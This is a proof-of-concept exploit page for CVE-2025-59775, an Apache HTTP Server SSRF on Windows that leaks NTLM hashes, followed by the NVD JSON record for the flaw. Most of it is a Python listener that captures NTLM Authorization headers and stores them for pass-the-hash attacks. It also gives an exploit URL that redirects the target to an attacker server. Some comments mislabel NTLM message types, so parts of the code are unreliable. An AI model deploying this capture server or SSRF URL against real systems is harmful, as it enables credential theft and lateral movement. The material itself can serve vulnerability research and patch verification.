CVE-2025-59775

# CVE-2025-59775 PoC - Apache SSRF NTLM Hash Leak # Requires: Apache with AllowEncodedSlashes On and MergeSlashes Off on Windows # Target must have access to the malicious server import http.server import socketserver import base64 import re class NTLMCaptureHandler(http.server.BaseHTTPRequestHandler): def do_GET(self): # Log the Authorization header containing NTLM hash auth_header = self.headers.get('Authorization', '') if 'NTLM' in auth_header: # Extract NTLM Type 2 message (server challenge) ntlm_match = re.search(r'NTLM ([A-Za-z0-9+/=]+)', auth_header) if ntlm_match: ntlm_data = base64.b64decode(ntlm_match.group(1)) print(f'[+] NTLM Hash captured from {self.client_address}') print(f'[+] NTLM Type 1: {ntlm_match.group(1)}') # Save for Pass-the-Hash attack with open('captured_hashes.txt', 'a') as f: f.write(f'{self.client_address[0]}:{ntlm_match.group(1)}\n') # Send NTLM challenge (Type 2) self.send_response(401) self.send_header('WWW-Authenticate', 'NTLM') self.send_header('Connection', 'close') self.end_headers() def log_message(self, format, *args): print(f'[*] {self.address_string()} - {format % args}') class NTLMServer: def __init__(self, port=8080): self.port = port def start(self): with socketserver.TCPServer(('', self.port), NTLMCaptureHandler) as httpd: print(f'[*] NTLM Capture Server running on port {self.port}') print('[*] Waiting for Apache SSRF requests...') httpd.serve_forever() if __name__ == '__main__': # Start malicious server to capture NTLM hashes server = NTLMServer(port=8080) server.start() # Exploit URL (to be used in SSRF attack): # http://target-server/%2e%2e/%2e%2e/%2e%2e/http://attacker-server:8080/

{"cve": {"id": "CVE-2025-59775", "sourceIdentifier": "[email protected]", "published": "2025-12-05T11:15:52.210", "lastModified": "2025-12-10T16:40:04.333", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Server-Side Request Forgery (SSRF) vulnerability \n\n in Apache HTTP Server on Windows \n\nwith AllowEncodedSlashes On and MergeSlashes Off  allows to potentially leak NTLM \nhashes to a malicious server via SSRF and malicious requests or content\n\nUsers are recommended to upgrade to version 2.4.66, which fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.4.0", "versionEndExcluding": "2.4.66", "matchCriteriaId": "2E190AC9-8786-444C-877C-DE4BC272331F"}]}]}], "references": [{"url": "https://httpd.apache.org/security/vulnerabilities_24.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/12/04/6", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Issue Tracking", "Third Party Advisory"]}]}}